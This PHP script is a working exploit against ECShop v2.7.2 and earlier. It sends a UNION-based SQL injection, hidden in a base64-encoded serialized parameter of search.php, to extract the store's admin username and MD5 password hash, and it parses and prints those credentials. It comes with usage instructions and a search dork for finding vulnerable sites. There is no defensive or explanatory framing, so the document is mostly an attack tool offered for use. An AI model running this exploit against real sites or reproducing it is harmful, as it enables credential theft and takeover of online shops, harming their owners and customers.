#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.7.2 SQL injection / admin credentials disclosure exploit
by puret_t
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
 print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
 exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match('#\':([\S]+):([a-z0-9]{32})\'#', $resp, $hash);

if ($hash)
 exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");
else
 exit("Exploit Failed!\n");

function send()
{
 global $host, $path;
 
 $arr = array('attr' => array('\') AND 0 UNION SELECT (SELECT CONCAT(0x27,0x3a,user_name,0x3a,password) FROM ecs_admin_user WHERE action_list=\'all\' LIMIT 1), 1#' => 1));
 $cmd = base64_encode(serialize($arr));

 $data = "GET ".$path."search.php?encode=".$cmd."  HTTP/1.1\r\n";
 $data .= "Host: $host\r\n";
 $data .= "Connection: Close\r\n\r\n";

 $fp = fsockopen($host, 80);
 fputs($fp, $data);

 $resp = '';

 while ($fp && !feof($fp))
  $resp .= fread($fp, 1024);

 return $resp;
}

?>